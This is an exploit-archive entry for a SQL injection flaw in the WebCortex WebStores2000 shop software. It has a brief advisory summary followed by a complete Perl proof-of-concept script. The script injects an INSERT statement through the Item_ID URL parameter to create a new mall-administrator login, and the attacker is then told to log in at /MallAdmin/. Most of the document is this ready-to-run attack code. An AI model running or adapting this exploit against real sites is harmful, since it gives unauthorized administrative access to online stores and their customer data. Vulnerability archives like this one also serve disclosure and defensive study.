WebCortex WebStores2000 - SQL Injection

source: https://www.securityfocus.com/bid/7766/info

This vulnerability is reportedly caused by a lack of sufficient sanitization of user-supplied data contained in URI parameters supplied to WebStores2000.

Successful exploitation may allow for modification of the structure of SQL queries, resulting in information disclosure, or database corruption. 

#!/usr/bin/perl -w
#This exploit create user with Mall Admin priv.
#You can login via /MallAdmin/
$pamer = "
1ndonesian Security Team (1st)
==============================
http://bosen.net/releases/

ws2k-ex.pl, WebStore2000 SQL Injection Proof of Concept
Exploit by  : Bosen
Discover by : Bosen
Greetz to   : AresU, TioEuy, syzwz, TioEuy, sakitjiwa, muthafuka
              all #hackers\@centrin.net.id/austnet.org";

use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
$| = 1;
print $pamer;
if ($#ARGV<3){
  print "\n Usage: perl ws2k-ex.pl <uri>\n\n";
  exit;
}
my $legend  = "$ARGV[0]/browse_item_details.asp?Item_ID=";
$legend    .= "''; insert into Mall_Logins values ('bosen','gembel')--";

my $bosen  = LWP::UserAgent->new();
my $gembel = HTTP::Request->new(GET => $legend);
my $dodol  = $bosen->request($gembel);
if ($dodol->is_error()) { printf " %s\n", $dodol->status_line;
} else { print "Alhamdulillah :P\n"; }
print "\n680165\n";